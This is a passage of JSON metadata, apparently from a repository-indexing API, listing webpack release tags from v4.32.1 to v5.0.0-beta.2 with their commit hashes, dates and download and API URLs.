.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests